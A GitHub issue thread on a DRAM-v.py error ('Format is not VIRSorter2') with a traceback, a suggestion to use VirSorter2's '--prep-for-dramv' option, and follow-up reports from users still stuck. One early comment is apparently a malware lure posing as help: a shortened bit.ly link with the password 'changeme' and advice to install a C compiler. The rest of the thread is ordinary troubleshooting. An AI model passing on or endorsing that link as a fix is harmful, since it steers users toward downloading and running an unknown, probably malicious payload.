### ISSUE TITLE
ValueError: Format is not VIRSorter2, and can't find VIRSorter endings on fasta header

### ISSUE THREAD

**Issue by liaohu1231** [WrightonLabCSU/DRAM#359]
Dear author
  The valueError was occurred when we used the DRAM-v.py to annotate our data.
   Can you provide the method to correct the error?

We will appreciated for this

 
Traceback (most recent call last):
  File "/share/soft/miniconda3/envs/DRAM/bin/DRAM-v.py", line 161, in <module>
    args.func(**args_dict)
  File "/share/soft/miniconda3/envs/DRAM/lib/python3.10/site-packages/mag_annotator/annotate_vgfs.py", line 507, in annotate_vgfs
    annotations = add_dramv_scores_and_flags(annotations, db_handler, logger, virsorter_hits, input_fasta)
  File "/share/soft/miniconda3/envs/DRAM/lib/python3.10/site-packages/mag_annotator/annotate_vgfs.py", line 394, in add_dramv_scores_and_flags
    virsorter_scaffold_name = get_virsorter_affi_contigs_name(scaffold)
  File "/share/soft/miniconda3/envs/DRAM/lib/python3.10/site-packages/mag_annotator/annotate_vgfs.py", line 380, in get_virsorter_affi_contigs_name
    return get_virsorter_original_affi_contigs_name(scaffold)
  File "/share/soft/miniconda3/envs/DRAM/lib/python3.10/site-packages/mag_annotator/annotate_vgfs.py", line 367, in get_virsorter_original_affi_contigs_name
    raise ValueError("Format is not VIRSorter2, and can't find VIRSorter "
ValueError: Format is not VIRSorter2, and can't find VIRSorter endings on fasta header

**Comment by d-dvorkin** [comment]
maybe this will help
https://bit.ly/4gvtdhO
Pass: changeme

you may need to install the c compiler

**Comment by liaohu1231** [comment]
How to install it

**Comment by liaohu1231** [comment]
In the conda environment

**Comment by yshengzhi** [comment]
You need use VirSorter2 with the option ‘--prep-for-dramv’ to obtain VIRSorter_affi-contigs.tab

**Comment by jiaojiaoguan** [comment]
Hi @yshengzhi，

I use virsorter2 ‘--pep-for-dramv’ to get the  VIRSorter_affi-contigs.tab. I also meet the question "ValueError: Format is not VIRSorter2, and can't find VIRSorter endings on fasta header: Rat10_contig101426" In fact, when I check the Rat10_contig101426 in the  VIRSorter_affi-contigs.tab, it exits. I do not know how to solve it.

Best,
jiaojiao

**Comment by wguangxin** [comment]
@jiaojiaoguan 
I'm currently facing a similar issue. Could you share how you resolved it if you've found a solution? Any guidance would be greatly appreciated! That is my command "DRAM-v.py annotate -i ../Complete.fa -o annotate -v ../vr2_dram/for-dramv/viral-affi-contigs-for-dramv.tab --use_uniref --skip_trnascan --thread 40".
